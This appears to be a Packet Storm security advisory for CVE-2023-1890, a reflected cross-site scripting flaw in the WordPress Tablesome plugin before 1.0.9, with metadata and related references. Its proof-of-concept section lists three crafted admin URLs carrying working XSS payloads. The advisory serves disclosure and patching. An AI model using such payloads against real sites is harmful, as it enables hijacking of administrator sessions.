Lucene search
Taurus OmarPACKETSTORM:173727HistoryJul 25, 2023 - 12:00 a.m.
WordPress Tablesome Cross Site Scripting
2023-07-2500:00:00
Taurus Omar
packetstormsecurity.com
141
wordpress
tablesome
cross-site scripting
reflected
cve-2023-1890
xss
proof of concept
wpscan
EPSS
0.003
Percentile
70.9%
`Tittle:
WordPress Plugin Tablesome < 1.0.9 - Reflected XSS
References:
CVE-2023-1890
Author:
Taurus Omar
Description:
The plugin does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting
Affects Plugins:
Tablesome - Fixed in version 1.0.9
Proof of Concept:
Make a logged in admin open one of the URL below when the feature/tracking notice has not been dismissed yet
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&a%22%3E%27%3E%3Cdetails%2Fopen%2Fontoggle%3Dconfirm%28%27XSS%27%29%3E
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&tablesome_feature_notice_dismissed=1&</script><script>alert(/XSS/)</script>
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&can_track_tablesome_events=1&</script><script>alert(/XSS/)</script>
Classification:
Type XSS
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79
wpScan:
https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d
`
Related
wpvulndb
wpvulndb
Tablesome < 1.0.9 - Reflected XSS
2023-04-24 00:00:00
wpexploit
wpexploit
Tablesome < 1.0.9 - Reflected XSS
2023-04-24 00:00:00
cve
cve
CVE-2023-1890
2023-05-15 13:15:10
cvelist
cvelist
CVE-2023-1890 Tablesome < 1.0.9 - Reflected XSS
2023-05-15 12:15:41
nuclei
nuclei
Tablesome < 1.0.9 - Cross-Site Scripting
2023-07-07 09:38:49
prion
prion
Cross site scripting
2023-05-15 13:15:00
nvd
nvd
CVE-2023-1890
2023-05-15 13:15:10